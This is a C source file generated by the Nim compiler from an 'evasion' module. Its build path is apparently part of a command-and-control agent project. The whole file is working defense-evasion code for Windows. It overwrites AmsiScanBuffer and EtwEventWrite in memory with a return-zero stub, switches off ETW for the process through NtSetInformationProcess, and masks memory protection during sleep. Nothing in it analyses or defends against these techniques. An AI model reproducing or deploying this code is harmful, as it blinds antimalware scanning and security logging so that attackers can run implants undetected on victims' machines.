/* Generated by Nim Compiler v2.2.10 */
/* Compiled for: Windows, amd64, gcc */
/* Command for C compiler:
   x86_64-w64-mingw32-gcc -c -w -fmax-errors=3 -mno-ms-bitfields -fno-strict-aliasing -DWIN32_LEAN_AND_MEAN -Os -fno-ident   -I/home/kali/.choosenim/toolchains/nim-2.2.10/lib -I/home/kali/c2/agents/agent-nim -o /home/kali/c2/agents/agent-nim/nimcache_final/@mevasion.nim.c.o /home/kali/c2/agents/agent-nim/nimcache_final/@mevasion.nim.c */
#define NIM_INTBITS 64

#include "nimbase.h"
#include <string.h>
#undef LANGUAGE_C
#undef MIPSEB
#undef MIPSEL
#undef PPC
#undef R3000
#undef R4000
#undef i386
#undef linux
#undef mips
#undef near
#undef far
#undef powerpc
#undef unix
typedef struct NimStrPayload NimStrPayload;
typedef struct NimStringV2 NimStringV2;
typedef N_STDCALL_PTR(NI, tyProc__E5YB9csXgVe1kveJGRzh5OQ) (NIM_CHAR* lpLibFileName_p0);
struct NimStrPayload {
	NI cap;
	NIM_CHAR data[SEQ_DECL_SIZE];
};
struct NimStringV2 {
	NI len;
	NimStrPayload* p;
};
typedef N_STDCALL_PTR(void*, tyProc__0jr8jiP1mbzQ6RKBrEEqrw) (NI hModule_p0, NIM_CHAR* lpProcName_p1);
typedef N_STDCALL_PTR(NI32, tyProc__p7k7hzRLl9cL8zqB8iUhO9cA) (void* lpAddress_p0, NI64 dwSize_p1, NI32 flNewProtect_p2, NI32* lpflOldProtect_p3);
typedef NU8 tyArray__MH3Xl37Mgf0SKCrLn4Ztzg[3];
typedef N_STDCALL_PTR(NI32, tyProc__fMigNdXgmTLA3kMzSYCkdA) (NI h_p0, NI32 cls_p1, void* info_p2, NI32 sz_p3);
typedef N_STDCALL_PTR(NI, tyProc__uryidYWkntM7ddjZSyxvyQ) (void);
typedef N_STDCALL_PTR(NI64, tyProc__pdvM9cE5kOE4yT8D0B1TnYQ) (NI hHeap_p0, NI32 dwFlags_p1, void* lpMem_p2);
typedef N_STDCALL_PTR(void*, tyProc__bREaOok5B7e9c9crOwTPdBhg) (void* lpAddress_p0, NI64 dwSize_p1, NI32 flAllocationType_p2, NI32 flProtect_p3);
typedef N_STDCALL_PTR(NI32, tyProc__qzER9a83At0GuyLU6E9cw7Lw) (void* lpAddress_p0, NI64 dwSize_p1, NI32 dwFreeType_p2);
N_LIB_PRIVATE N_NIMCALL(void, patchAMSI__evasion_u19)(void);
N_LIB_PRIVATE N_NIMCALL(NIM_CHAR*, winstrConverterStringToPtrChar__pkgZwinimZwinstr_u795)(NimStringV2 x_p0);
N_LIB_PRIVATE N_NIMCALL(void, patchBytes__evasion_u6)(void* address_p0, NU8* patch_p1, NI patch_p1Len_0);
static N_INLINE(void, copyMem__system_u1755)(void* dest_p0, void* source_p1, NI size_p2);
static N_INLINE(void, nimCopyMem)(void* dest_p0, void* source_p1, NI size_p2);
static N_INLINE(NIM_BOOL*, nimErrorFlag)(void);
N_LIB_PRIVATE N_NIMCALL(void, patchETW__evasion_u41)(void);
N_LIB_PRIVATE N_NIMCALL(void, disableETWProcess__evasion_u44)(void);
N_LIB_PRIVATE N_NIMCALL(void, initSleepKey__evasion_u149)(void);
N_LIB_PRIVATE N_NIMCALL(void, randomize__pureZrandom_u377)(void);
N_LIB_PRIVATE N_NIMCALL(NI, rand__pureZrandom_u143)(NI max_p0);
N_LIB_PRIVATE N_NIMCALL(void, nossleep)(NI milsecs_p0);
static const struct {
  NI cap; NIM_CHAR data[8+1];
} TM__wo7ubYKOtOcqtfxQiyH9akw_2 = { 8 | NIM_STRLIT_FLAG, "amsi.dll" };
static const NimStringV2 TM__wo7ubYKOtOcqtfxQiyH9akw_3 = {8, (NimStrPayload*)&TM__wo7ubYKOtOcqtfxQiyH9akw_2};
static const struct {
  NI cap; NIM_CHAR data[14+1];
} TM__wo7ubYKOtOcqtfxQiyH9akw_4 = { 14 | NIM_STRLIT_FLAG, "AmsiScanBuffer" };
static const NimStringV2 TM__wo7ubYKOtOcqtfxQiyH9akw_5 = {14, (NimStrPayload*)&TM__wo7ubYKOtOcqtfxQiyH9akw_4};
static const struct {
  NI cap; NIM_CHAR data[9+1];
} TM__wo7ubYKOtOcqtfxQiyH9akw_7 = { 9 | NIM_STRLIT_FLAG, "ntdll.dll" };
static const NimStringV2 TM__wo7ubYKOtOcqtfxQiyH9akw_8 = {9, (NimStrPayload*)&TM__wo7ubYKOtOcqtfxQiyH9akw_7};
static const struct {
  NI cap; NIM_CHAR data[13+1];
} TM__wo7ubYKOtOcqtfxQiyH9akw_9 = { 13 | NIM_STRLIT_FLAG, "EtwEventWrite" };
static const NimStringV2 TM__wo7ubYKOtOcqtfxQiyH9akw_10 = {13, (NimStrPayload*)&TM__wo7ubYKOtOcqtfxQiyH9akw_9};
static const NimStringV2 TM__wo7ubYKOtOcqtfxQiyH9akw_11 = {9, (NimStrPayload*)&TM__wo7ubYKOtOcqtfxQiyH9akw_7};
static const struct {
  NI cap; NIM_CHAR data[23+1];
} TM__wo7ubYKOtOcqtfxQiyH9akw_12 = { 23 | NIM_STRLIT_FLAG, "NtSetInformationProcess" };
static const NimStringV2 TM__wo7ubYKOtOcqtfxQiyH9akw_13 = {23, (NimStrPayload*)&TM__wo7ubYKOtOcqtfxQiyH9akw_12};
static NIM_CONST tyArray__MH3Xl37Mgf0SKCrLn4Ztzg TM__wo7ubYKOtOcqtfxQiyH9akw_6 = {((NU8)51),
((NU8)192),
((NU8)195)}
;
N_LIB_PRIVATE NU64 xorSleepKey__evasion_u148 = 0ULL;
extern tyProc__E5YB9csXgVe1kveJGRzh5OQ Dl_2013270634_;
extern tyProc__0jr8jiP1mbzQ6RKBrEEqrw Dl_2013268496_;
extern tyProc__p7k7hzRLl9cL8zqB8iUhO9cA Dl_2013268535_;
extern NIM_THREADVAR NIM_BOOL nimInErrorMode__system_u4172;
extern tyProc__E5YB9csXgVe1kveJGRzh5OQ Dl_2013268394_;
extern tyProc__uryidYWkntM7ddjZSyxvyQ Dl_2013268305_;
extern tyProc__pdvM9cE5kOE4yT8D0B1TnYQ Dl_2013268301_;
extern tyProc__bREaOok5B7e9c9crOwTPdBhg Dl_2013268526_;
extern tyProc__qzER9a83At0GuyLU6E9cw7Lw Dl_2013268531_;
static N_INLINE(void, nimCopyMem)(void* dest_p0, void* source_p1, NI size_p2) {
	void* T1_;
	T1_ = (void*)0;
	T1_ = memcpy(dest_p0, source_p1, ((size_t) (size_p2)));
}
static N_INLINE(void, copyMem__system_u1755)(void* dest_p0, void* source_p1, NI size_p2) {
	nimCopyMem(dest_p0, source_p1, size_p2);
}
N_LIB_PRIVATE N_NIMCALL(void, patchBytes__evasion_u6)(void* address_p0, NU8* patch_p1, NI patch_p1Len_0) {
	NI32 oldProt_1;
	NI32 T1_;
	NI32 T2_;
	oldProt_1 = (NI32)0;
	T1_ = (NI32)0;
	T1_ = Dl_2013268535_(address_p0, ((NI64) (patch_p1Len_0)), ((NI32)64), (&oldProt_1));
	(void)(T1_);
	copyMem__system_u1755(address_p0, ((void*) ((&patch_p1[((NI)0)]))), (patch_p1Len_0));
	T2_ = (NI32)0;
	T2_ = Dl_2013268535_(address_p0, ((NI64) (patch_p1Len_0)), oldProt_1, (&oldProt_1));
	(void)(T2_);
}
static N_INLINE(NIM_BOOL*, nimErrorFlag)(void) {
	NIM_BOOL* result;
	result = (&nimInErrorMode__system_u4172);
	return result;
}
N_LIB_PRIVATE N_NIMCALL(void, patchAMSI__evasion_u19)(void) {
	NI amsi_1;
	NIM_CHAR* T1_;
	void* fn_1;
	NIM_CHAR* T6_;
NIM_BOOL* nimErr_;
{nimErr_ = nimErrorFlag();
	T1_ = (NIM_CHAR*)0;
	T1_ = winstrConverterStringToPtrChar__pkgZwinimZwinstr_u795(TM__wo7ubYKOtOcqtfxQiyH9akw_3);
	if (NIM_UNLIKELY(*nimErr_)) goto BeforeRet_;
	amsi_1 = Dl_2013270634_(T1_);
	{
		if (!(amsi_1 == ((NI)0))) goto LA4_;
		goto BeforeRet_;
	}
LA4_: ;
	T6_ = (NIM_CHAR*)0;
	T6_ = winstrConverterStringToPtrChar__pkgZwinimZwinstr_u795(TM__wo7ubYKOtOcqtfxQiyH9akw_5);
	if (NIM_UNLIKELY(*nimErr_)) goto BeforeRet_;
	fn_1 = Dl_2013268496_(amsi_1, T6_);
	{
		if (!(fn_1 == NIM_NIL)) goto LA9_;
		goto BeforeRet_;
	}
LA9_: ;
	patchBytes__evasion_u6(fn_1, TM__wo7ubYKOtOcqtfxQiyH9akw_6, 3);
	if (NIM_UNLIKELY(*nimErr_)) goto BeforeRet_;
	}BeforeRet_: ;
}
N_LIB_PRIVATE N_NIMCALL(void, patchETW__evasion_u41)(void) {
	NI ntdll_1;
	NIM_CHAR* T1_;
	void* fn_1;
	NIM_CHAR* T6_;
NIM_BOOL* nimErr_;
{nimErr_ = nimErrorFlag();
	T1_ = (NIM_CHAR*)0;
	T1_ = winstrConverterStringToPtrChar__pkgZwinimZwinstr_u795(TM__wo7ubYKOtOcqtfxQiyH9akw_8);
	if (NIM_UNLIKELY(*nimErr_)) goto BeforeRet_;
	ntdll_1 = Dl_2013268394_(T1_);
	{
		if (!(ntdll_1 == ((NI)0))) goto LA4_;
		goto BeforeRet_;
	}
LA4_: ;
	T6_ = (NIM_CHAR*)0;
	T6_ = winstrConverterStringToPtrChar__pkgZwinimZwinstr_u795(TM__wo7ubYKOtOcqtfxQiyH9akw_10);
	if (NIM_UNLIKELY(*nimErr_)) goto BeforeRet_;
	fn_1 = Dl_2013268496_(ntdll_1, T6_);
	{
		if (!(fn_1 == NIM_NIL)) goto LA9_;
		goto BeforeRet_;
	}
LA9_: ;
	patchBytes__evasion_u6(fn_1, TM__wo7ubYKOtOcqtfxQiyH9akw_6, 3);
	if (NIM_UNLIKELY(*nimErr_)) goto BeforeRet_;
	}BeforeRet_: ;
}
N_LIB_PRIVATE N_NIMCALL(void, disableETWProcess__evasion_u44)(void) {
	NI ntdll_1;
	NIM_CHAR* T1_;
	tyProc__fMigNdXgmTLA3kMzSYCkdA fn_1;
	NIM_CHAR* T6_;
	void* T7_;
	NI32 flag_1;
	NI32 T12_;
NIM_BOOL* nimErr_;
{nimErr_ = nimErrorFlag();
	T1_ = (NIM_CHAR*)0;
	T1_ = winstrConverterStringToPtrChar__pkgZwinimZwinstr_u795(TM__wo7ubYKOtOcqtfxQiyH9akw_11);
	if (NIM_UNLIKELY(*nimErr_)) goto BeforeRet_;
	ntdll_1 = Dl_2013268394_(T1_);
	{
		if (!(ntdll_1 == ((NI)0))) goto LA4_;
		goto BeforeRet_;
	}
LA4_: ;
	T6_ = (NIM_CHAR*)0;
	T6_ = winstrConverterStringToPtrChar__pkgZwinimZwinstr_u795(TM__wo7ubYKOtOcqtfxQiyH9akw_13);
	if (NIM_UNLIKELY(*nimErr_)) goto BeforeRet_;
	T7_ = (void*)0;
	T7_ = Dl_2013268496_(ntdll_1, T6_);
	fn_1 = ((tyProc__fMigNdXgmTLA3kMzSYCkdA) (T7_));
	{
		if (!(fn_1 == NIM_NIL)) goto LA10_;
		goto BeforeRet_;
	}
LA10_: ;
	flag_1 = ((NI32)0);
	T12_ = (NI32)0;
	T12_ = fn_1(((NI)-1), ((NI32)87), ((void*) ((&flag_1))), ((NI32)4));
	if (NIM_UNLIKELY(*nimErr_)) goto BeforeRet_;
	(void)(T12_);
	}BeforeRet_: ;
}
N_LIB_PRIVATE N_NIMCALL(void, initSleepKey__evasion_u149)(void) {
	NI T1_;
NIM_BOOL* nimErr_;
{nimErr_ = nimErrorFlag();
	randomize__pureZrandom_u377();
	if (NIM_UNLIKELY(*nimErr_)) goto BeforeRet_;
	T1_ = (NI)0;
	T1_ = rand__pureZrandom_u143(((NI)IL64(9223372036854775807)));
	if (NIM_UNLIKELY(*nimErr_)) goto BeforeRet_;
	xorSleepKey__evasion_u148 = ((NU64) (T1_));
	}BeforeRet_: ;
}
N_LIB_PRIVATE N_NIMCALL(void, applyEvasion__evasion_u302)(void) {
NIM_BOOL* nimErr_;
{nimErr_ = nimErrorFlag();
	patchAMSI__evasion_u19();
	if (NIM_UNLIKELY(*nimErr_)) goto BeforeRet_;
	patchETW__evasion_u41();
	if (NIM_UNLIKELY(*nimErr_)) goto BeforeRet_;
	disableETWProcess__evasion_u44();
	if (NIM_UNLIKELY(*nimErr_)) goto BeforeRet_;
	initSleepKey__evasion_u149();
	if (NIM_UNLIKELY(*nimErr_)) goto BeforeRet_;
	}BeforeRet_: ;
}
N_LIB_PRIVATE N_NIMCALL(void, sleepMasked__evasion_u154)(NI ms_p0) {
	NI heap_1;
	NI64 size_1;
	NI64 dummySize_1;
	void* dummy_1;
NIM_BOOL* nimErr_;
{nimErr_ = nimErrorFlag();
	{
		if (!(ms_p0 <= ((NI)0))) goto LA3_;
		goto BeforeRet_;
	}
LA3_: ;
	heap_1 = Dl_2013268305_();
	size_1 = Dl_2013268301_(heap_1, ((NI32)0), ((void*) (heap_1)));
	dummySize_1 = IL64(4096);
	dummy_1 = Dl_2013268526_(NIM_NIL, dummySize_1, ((NI32)12288), ((NI32)4));
	{
		NI32 old_1;
		NI32 T9_;
		NI32 T10_;
		NI32 T11_;
		if (!!((dummy_1 == NIM_NIL))) goto LA7_;
		old_1 = (NI32)0;
		T9_ = (NI32)0;
		T9_ = Dl_2013268535_(dummy_1, dummySize_1, ((NI32)1), (&old_1));
		(void)(T9_);
		nossleep(ms_p0);
		if (NIM_UNLIKELY(*nimErr_)) goto BeforeRet_;
		T10_ = (NI32)0;
		T10_ = Dl_2013268535_(dummy_1, dummySize_1, ((NI32)4), (&old_1));
		(void)(T10_);
		T11_ = (NI32)0;
		T11_ = Dl_2013268531_(dummy_1, IL64(0), ((NI32)32768));
		(void)(T11_);
	}
	goto LA5_;
LA7_: ;
	{
		nossleep(ms_p0);
		if (NIM_UNLIKELY(*nimErr_)) goto BeforeRet_;
	}
LA5_: ;
	}BeforeRet_: ;
}
